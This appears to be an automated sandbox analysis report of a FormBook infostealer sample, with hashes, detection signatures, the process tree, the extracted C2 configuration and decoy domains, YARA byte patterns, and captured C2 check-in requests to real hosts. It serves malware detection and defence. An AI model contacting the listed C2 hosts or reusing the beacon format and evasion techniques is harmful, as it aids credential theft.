Windows Analysis Report v8kZUFgdD4.exe

Overview

General Information

Sample Name: v8kZUFgdD4.exe
Analysis ID: 452667
MD5: 57f3ae2842ffb5ceea386d0b97a52818
SHA1: 68423398d025d3cbbb944ee4c3cea5501df67761
SHA256: a0c7b3d44a5cfcda917fc80c099da5ab3de582ff7c24f1373b4bd25f88d61e52
Tags: exe, Formbook

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Uses ipconfig to lookup or modify the Windows network settings
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Process Tree

  • System is w10x64
  • v8kZUFgdD4.exe (PID: 724 cmdline: 'C:\Users\user\Desktop\v8kZUFgdD4.exe' MD5: 57F3AE2842FFB5CEEA386D0B97A52818)
    • v8kZUFgdD4.exe (PID: 6148 cmdline: 'C:\Users\user\Desktop\v8kZUFgdD4.exe' MD5: 57F3AE2842FFB5CEEA386D0B97A52818)
      • explorer.exe (PID: 3440 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • ipconfig.exe (PID: 6580 cmdline: C:\Windows\SysWOW64\ipconfig.exe MD5: B0C7423D02A007461C850CD0DFE09318)
          • cmd.exe (PID: 6744 cmdline: /c del 'C:\Users\user\Desktop\v8kZUFgdD4.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6760 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.extinctionbrews.com/dy8g/"], "decoy": ["mzyxi-rkah-y.net", "okinawarongnho.com", "qq66520.com", "nimbus.watch", "cwdelrio.com", "regalshopper.com", "avito-payment.life", "jorgeporcayo.com", "galvinsky.digital", "guys-only.com", "asmfruits-almacenes.com", "boatrace-life04.net", "cochez.club", "thelastvictor.net", "janieleconte.com", "ivoirepneus.com", "saludflv.info", "mydreamtv.net", "austinphy.com", "cajunseafoodstcloud.com", "13006608192.com", "clear3media.com", "thegrowclinic.com", "findfoodshop.com", "livegaming.store", "greensei.com", "atmaapothecary.com", "builtbydawn.com", "wthcoffee.com", "melodezu.com", "oikoschain.com", "matcitekids.com", "killrstudio.com", "doityourselfism.com", "monsoonnerd.com", "swissbankmusic.com", "envisionfordheights.com", "invisiongc.net", "aizaibali.com", "professioneconsulenza.net", "chaneabond.com", "theamercianhouseboat.com", "scuolatua.com", "surivaganza.com", "xn--vuq722jwngjre.com", "quiteimediato.space", "ecofingers.com", "manageoceanaccount.com", "cindywillardrealtor.com", "garimpeirastore.online", "tinsley.website", "fitnesstwentytwenty.com", "thenorthgoldline.com", "scuolacounselingroma.com", "iwccgroup.com", "wideawakemomma.com", "anthonysavillemiddleschool.com", "sprinkleresources.com", "ravexim3.com", "onedadtwodudes.com", "shxytl.com", "iriscloudvideo.com", "theshapecreator.com", "vermogenswerte.com"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000007.00000002.599150521.0000000001330000.00000004.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000007.00000002.599150521.0000000001330000.00000004.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
    • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000007.00000002.599150521.0000000001330000.00000004.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
    • 0x166c9:$sqlite3step: 68 34 1C 7B E1
    • 0x167dc:$sqlite3step: 68 34 1C 7B E1
    • 0x166f8:$sqlite3text: 68 38 2A 90 C5
    • 0x1681d:$sqlite3text: 68 38 2A 90 C5
    • 0x1670b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16833:$sqlite3blob: 68 53 D8 7F 8C
00000001.00000002.389518635.0000000000400000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000001.00000002.389518635.0000000000400000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
    • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Unpacked PEs

Source | Rule | Description | Author | Strings
0.2.v8kZUFgdD4.exe.21d0000.2.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
0.2.v8kZUFgdD4.exe.21d0000.2.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
    • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0.2.v8kZUFgdD4.exe.21d0000.2.raw.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
    • 0x166c9:$sqlite3step: 68 34 1C 7B E1
    • 0x167dc:$sqlite3step: 68 34 1C 7B E1
    • 0x166f8:$sqlite3text: 68 38 2A 90 C5
    • 0x1681d:$sqlite3text: 68 38 2A 90 C5
    • 0x1670b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16833:$sqlite3blob: 68 53 D8 7F 8C
0.2.v8kZUFgdD4.exe.21d0000.2.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
0.2.v8kZUFgdD4.exe.21d0000.2.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
    • 0x77f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x7b92:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x138a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x13391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x139a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x13b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x85aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1260c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x9322:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x18997:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x19a3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

AV Detection:

Antivirus detection for URL or domain
Source: http://www.findfoodshop.com/dy8g/?i0GDM=4wzaECy4GBTuQnITbNLpu7AOQbyqIYrzJAsJNgGB2dTR99UQwJdt+FpFkOawEfEVdOlYoXAvoA==&0X=C6Ah3vPx | Avira URL Cloud: Label: malware
Source: http://www.invisiongc.net/dy8g/?i0GDM=MBhh1pO56K3YrZO9qJkl6N96HaWfS+D/lXW6/vw2t4O2Fl+GB2YqMK2ZraksguVxeKRya9uu2A==&0X=C6Ah3vPx | Avira URL Cloud: Label: malware
Found malware configuration
Source: 00000007.00000002.599150521.0000000001330000.00000004.00000001.sdmp | Malware Configuration Extractor: FormBook (same configuration as listed in the Malware Configuration section above)
Multi AV Scanner detection for submitted file
Source: v8kZUFgdD4.exe | Virustotal: Detection: 38%
Yara detected FormBook
Source: Yara match | File source: 0.2.v8kZUFgdD4.exe.21d0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.v8kZUFgdD4.exe.21d0000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.v8kZUFgdD4.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.v8kZUFgdD4.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.1.v8kZUFgdD4.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000007.00000002.599150521.0000000001330000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.389518635.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.597969689.0000000000EA0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.341137782.00000000021D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.389832598.00000000009F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.598432080.0000000001100000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.389732615.00000000005B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000001.339035509.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: 7.2.ipconfig.exe.3ac7960.5.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 0.2.v8kZUFgdD4.exe.2190000.1.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 7.2.ipconfig.exe.11406b0.0.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 0.2.v8kZUFgdD4.exe.21d0000.2.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 1.2.v8kZUFgdD4.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 1.1.v8kZUFgdD4.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: v8kZUFgdD4.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
Source: Binary string: ipconfig.pdb source: v8kZUFgdD4.exe, 00000001.00000002.389856707.0000000000A20000.00000040.00000001.sdmp
Source: Binary string: ipconfig.pdbGCTL source: v8kZUFgdD4.exe, 00000001.00000002.389856707.0000000000A20000.00000040.00000001.sdmp
Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000005.00000000.363215324.000000000DC20000.00000002.00000001.sdmp
Source: Binary string: wntdll.pdbUGP source: v8kZUFgdD4.exe, 00000000.00000003.338578386.0000000002500000.00000004.00000001.sdmp, v8kZUFgdD4.exe, 00000001.00000002.389979034.0000000000A30000.00000040.00000001.sdmp, ipconfig.exe, 00000007.00000002.599975463.0000000003590000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: v8kZUFgdD4.exe, ipconfig.exe
Source: Binary string: wscui.pdb source: explorer.exe, 00000005.00000000.363215324.000000000DC20000.00000002.00000001.sdmp
Source: C:\Users\user\Desktop\v8kZUFgdD4.exe | Code function: 4x nop then pop esi
Source: C:\Users\user\Desktop\v8kZUFgdD4.exe | Code function: 4x nop then pop ebx
Source: C:\Users\user\Desktop\v8kZUFgdD4.exe | Code function: 4x nop then pop edi
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 4x nop then pop esi
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 4x nop then pop ebx
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 4x nop then pop edi

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49748 -> 34.102.136.180:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49748 -> 34.102.136.180:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49748 -> 34.102.136.180:80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49753 -> 52.58.78.16:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49753 -> 52.58.78.16:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49753 -> 52.58.78.16:80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49762 -> 103.138.88.11:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49762 -> 103.138.88.11:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49762 -> 103.138.88.11:80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49763 -> 162.241.62.54:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49763 -> 162.241.62.54:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49763 -> 162.241.62.54:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor | URLs: www.extinctionbrews.com/dy8g/
Source: global traffic | HTTP traffic detected: GET /dy8g/?i0GDM=DjnY/S7/G1yk/GGdjnbMG0pwlAlipgBY8a8MDSEvYTAaE8/8s3MkSQswoGP3cSH4hj9/IphBwA==&0X=C6Ah3vPx HTTP/1.1 | Host: www.extinctionbrews.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /dy8g/?i0GDM=Y4JBfBjBKMGzbUzrNu+ARLK4ZQab+dap1kq40YSvqSzyJ/mfRg4U9+Lz1eKJfRLK3cAmaa0bkw==&0X=C6Ah3vPx HTTP/1.1 | Host: www.doityourselfism.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /dy8g/?i0GDM=X9Az7RthaT8xdqkxQ6tJRjQeFUHqBPh6fb7YU5dnwYv1rghxnAYW3P4f0krKlocv9Wl7uwWiww==&0X=C6Ah3vPx HTTP/1.1 | Host: www.ecofingers.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /dy8g/?i0GDM=MBhh1pO56K3YrZO9qJkl6N96HaWfS+D/lXW6/vw2t4O2Fl+GB2YqMK2ZraksguVxeKRya9uu2A==&0X=C6Ah3vPx HTTP/1.1 | Host: www.invisiongc.net | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /dy8g/?i0GDM=4wzaECy4GBTuQnITbNLpu7AOQbyqIYrzJAsJNgGB2dTR99UQwJdt+FpFkOawEfEVdOlYoXAvoA==&0X=C6Ah3vPx HTTP/1.1 | Host: www.findfoodshop.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /dy8g/?i0GDM=DyFQJ285GCHWDKdZkYvFextRb5KpVMjfJilCoJQfsM3+VBHaRIBYykQk9iPNEqtroWJ/WwLhcg==&0X=C6Ah3vPx HTTP/1.1 | Host: www.scuolatua.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /dy8g/?i0GDM=uor47PkOoKkLY099HuArMxw1XFE/ncsTlzCE/ODY21NzZk1xVsb5QvrTgLDn7S7AYBCRuXEk2w==&0X=C6Ah3vPx HTTP/1.1 | Host: www.okinawarongnho.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /dy8g/?i0GDM=q7jKWIuNsoGkf7/hAqyN1U3v/GjJJAAs8Ri7ihl8JZVwqZwISrlxTPDImUVNZCFSYJzAIvZikA==&0X=C6Ah3vPx HTTP/1.1 | Host: www.jorgeporcayo.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: Joe Sandbox View | IP Address: 52.58.78.16
Source: Joe Sandbox View | ASN Name: AMAZON-02US
Source: Joe Sandbox View | ASN Name: ARUBA-ASNIT
Source: unknown | DNS traffic detected: queries for: www.aizaibali.com
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Cache-Control: private | Content-Type: text/html; charset=utf-8 | Server: Microsoft-IIS/8.5 | X-Powered-By: ASP.NET | Date: Thu, 22 Jul 2021 15:44:03 GMT | Connection: close | Content-Length: 5045 | Data Raw: (hex dump of the 5045-byte response body omitted)
Source: explorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000005.00000000.343561590.000000000095C000.00000004.00000020.sdmp | String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: explorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.sandoll.co.kr
Source: ipconfig.exe, 00000007.00000002.601572909.0000000003C42000.00000004.00000001.sdmp | String found in binary or memory: http://www.scuolatua.com:80/dy8g/?i0GDM=DyFQJ285GCHWDKdZkYvFextRb5KpVMjfJilCoJQfsM3
Source: explorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn

E-Banking Fraud:

Yara detected FormBook
Source: Yara match | File source: 0.2.v8kZUFgdD4.exe.21d0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.v8kZUFgdD4.exe.21d0000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.v8kZUFgdD4.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.v8kZUFgdD4.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.1.v8kZUFgdD4.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000007.00000002.599150521.0000000001330000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.389518635.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.597969689.0000000000EA0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.341137782.00000000021D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.389832598.00000000009F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.598432080.0000000001100000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.389732615.00000000005B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000001.339035509.0000000000400000.00000040.00020000.sdmp, type: MEMORY

System Summary:

          Malicious sample detected (through community Yara rule)Show sources
          Source: 0.2.v8kZUFgdD4.exe.21d0000.2.raw.unpack, type: UNPACKEDPE; Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.v8kZUFgdD4.exe.21d0000.2.raw.unpack, type: UNPACKEDPE; Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.v8kZUFgdD4.exe.21d0000.2.unpack, type: UNPACKEDPE; Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.v8kZUFgdD4.exe.21d0000.2.unpack, type: UNPACKEDPE; Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.v8kZUFgdD4.exe.400000.0.raw.unpack, type: UNPACKEDPE; Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.v8kZUFgdD4.exe.400000.0.raw.unpack, type: UNPACKEDPE; Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.v8kZUFgdD4.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.v8kZUFgdD4.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.599150521.0000000001330000.00000004.00000001.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.599150521.0000000001330000.00000004.00000001.sdmp, type: MEMORY; Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.389518635.0000000000400000.00000040.00000001.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.389518635.0000000000400000.00000040.00000001.sdmp, type: MEMORY; Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.597969689.0000000000EA0000.00000040.00000001.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.597969689.0000000000EA0000.00000040.00000001.sdmp, type: MEMORY; Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.341137782.00000000021D0000.00000040.00000001.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.341137782.00000000021D0000.00000040.00000001.sdmp, type: MEMORY; Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.389832598.00000000009F0000.00000040.00000001.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.389832598.00000000009F0000.00000040.00000001.sdmp, type: MEMORY; Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.598432080.0000000001100000.00000040.00000001.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.598432080.0000000001100000.00000040.00000001.sdmp, type: MEMORY; Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.389732615.00000000005B0000.00000040.00000001.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.389732615.00000000005B0000.00000040.00000001.sdmp, type: MEMORY; Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000001.339035509.0000000000400000.00000040.00020000.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000001.339035509.0000000000400000.00000040.00020000.sdmp, type: MEMORY; Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exe; Code function: 1_2_004181D0 NtCreateFile,
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exe; Code function: 1_2_00418280 NtReadFile,
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exe; Code function: 1_2_00418300 NtClose,
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exe; Code function: 1_2_004183B0 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exe; Code function: 1_2_00418222 NtCreateFile,
